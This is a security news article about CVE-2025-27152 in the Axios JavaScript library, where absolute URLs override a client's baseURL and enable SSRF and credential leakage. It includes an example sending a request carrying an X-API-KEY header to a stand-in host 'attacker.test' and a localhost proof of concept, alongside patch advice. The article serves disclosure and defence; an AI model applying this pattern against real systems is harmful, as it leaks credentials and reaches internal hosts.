A critical security issue has been identified in the Axios package for JavaScript, which poses significant risks to millions of servers due to server-side request forgery (SSRF) and credential leakage.
This vulnerability occurs when absolute URLs are used in Axios requests, even when a base URL is specified.
The vulnerability associated with Axios is identified by the CVE ID CVE-2025-27152. It affects versions of Axios less than or equal to 1.7.9 and has been rated with a moderate severity level.
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// Example of an absolute URL being passed
const userId = "http://attacker.test/";
// SSRF Vulnerability Example
await internalAPIClient.get(userId); // Sends request to http://attacker.test/ instead of the baseURL
In the code snippet above, even though a base URL is set for the Axios client, passing an absolute URL to the get() method leads to requests being sent directly to the specified absolute URL.
This bypasses the intended security mechanisms, as sensitive credentials such as the X-API-KEY are included in the request headers and can be leaked to unintended hosts.
To demonstrate this vulnerability, a simple proof of concept (PoC) can be set up using two local HTTP servers.
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
node main.js
The output will be “this is server2,” indicating that the request was successfully redirected to the unintended server.
The vulnerability poses two main risks:
To mitigate this risk, users should update to Axios version 1.8.2 or later, where the issue has been fixed. Additionally, implementing strict validation for any user-provided URLs is crucial to prevent SSRF attacks.
The vulnerability was reported by @lambdasawa shared in Github, adding emphasis on the importance of community involvement in software security.
This recent security issue highlights the need for diligence in managing dependencies and validating inputs, especially with widely used libraries like Axios.
By updating to patched versions and enforcing robust security practices, developers can protect their applications and internal networks from SSRF and credential leakage threats.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…